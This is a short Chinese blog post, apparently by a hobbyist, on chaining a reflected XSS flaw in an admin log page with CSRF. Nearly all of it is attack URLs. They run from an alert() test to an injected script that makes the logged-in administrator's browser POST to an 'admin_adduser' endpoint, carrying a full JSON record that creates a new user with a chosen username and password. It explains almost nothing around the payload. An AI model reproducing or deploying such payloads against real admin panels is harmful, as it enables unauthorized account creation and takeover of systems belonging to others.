xss利用csrf漏洞

  • A+
所属分类:颓废's Blog
摘要

xss漏洞

比如说

xss漏洞

https://www.0dayhack.com/admin_loglist.html?domain=<script>alert(xss)</script>

结合跨站漏洞

https://www.0dayhack.com/admin_loglist.html?domain=<script>ajaxRequest('目标地址','数据', "post")</script>

比如说

https://www.0dayhack.com/admin_loglist.html?domain=<script>ajaxRequest('admin_adduser','domain=netfairy.net&user={"username":"tadcdacest","password":"addscdamin","oldpassword":"","max_download":"0","max_upload":"0","max_download_account":"0","max_upload_account":"0","max_connection":"0","connect_timeout":"5","idle_timeout":"5","connect_per_ip":"0","pass_length":"0","show_hidden_file":0,"change_pass":0,"send_message":0,"ratio_credit":"0","ratio_download":"1","ratio_upload":"1","ratio_count_method":0,"enable_ratio":0,"current_quota":"0","max_quota":"0","enable_quota":0,"note_name":"","note_address":"","note_zip":"","note_phone":"","note_fax":"","note_email":"","note_memo":"","ipmasks":[],"filemasks":[],"directories":[],"usergroups":[],"subdir_perm":[],"enable_schedule":0,"schedules":[],"limit_reset_type":"0","limit_enable_upload":0,"cur_upload_size":"0","max_upload_size":"0","limit_enable_download":0,"cur_download_size":"0","max_download_size":"0","enable_expire":0,"expiretime":"2017-04-12 10:42:40","protocol_type":63,"enable_password":1,"enable_account":1,"ssh_pubkey_path":"","enable_ssh_pubkey_auth":0,"ssh_auth_method":0}', "post")</script>

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: